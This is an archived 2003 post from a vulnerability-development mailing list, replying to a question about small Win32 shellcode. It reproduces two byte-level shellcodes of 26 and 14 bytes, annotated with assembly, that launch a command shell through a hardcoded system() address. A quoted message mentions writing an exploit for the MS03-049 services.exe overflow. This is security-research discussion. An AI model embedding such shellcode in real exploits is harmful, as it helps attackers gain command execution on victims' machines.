Vulnerability Development mailing list archives
RE: [PenTest] Re: Win32 Shellcode question.
From: "Brett Moore" <brett.moore () security-assessment com>
Date: Tue, 2 Dec 2003 11:34:30 +1300
http://www.newroot.de/projects/winsys.c

// very small win2000/NT local shellcode (smallest i've seen)
/*
26byte execute system("cmd.exe ");
written by newroot
*/
unsigned char hellcode[]=
"\x8b\xec"              // mov ebp, esp
"\x55"                  // push ebp
"\x8b\xec"              // mov ebp, esp
"\x68\x65\x78\x65\x20"  // push 0x20657865
"\x68\x63\x6d\x64\x2e"  // push 0x2e646d63
"\x8d\x45\xf8"          // lea eax,[ebp-0x8]
"\x50"                  // push eax
"\xb8"                  // mov eax,
"\xad\xaa\x01\x78"      // 0x7801aaad <- address of system()
"\xff\xd0"              // call eax
;

; 14 byte no null byte execute system("cmd")
54               push esp           ; or pushf to put null terminator on stack
68 63 6D 64 20   push 20646D63h     ; push cmd
54               push esp           ; push location of cmd
B8 BF 8E 01 78   mov eax,78018EBFh  ; address of system()
FF D0            call eax           ; call system

-----Original Message-----
From: Tobias Klein [mailto:tobias.klein () ewetel de]
Sent: Monday, December 01, 2003 9:07 PM
To: Vinay A. Mahadik; vuln-dev () securityfocus com; pentest () yahoogroups com
Subject: [PenTest] Re: Win32 Shellcode question.

http://www.newroot.de/projects/winsys.c

greets
newroot

At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:
I was writing an exploit for the MS03-049 services.exe stack overflow vuln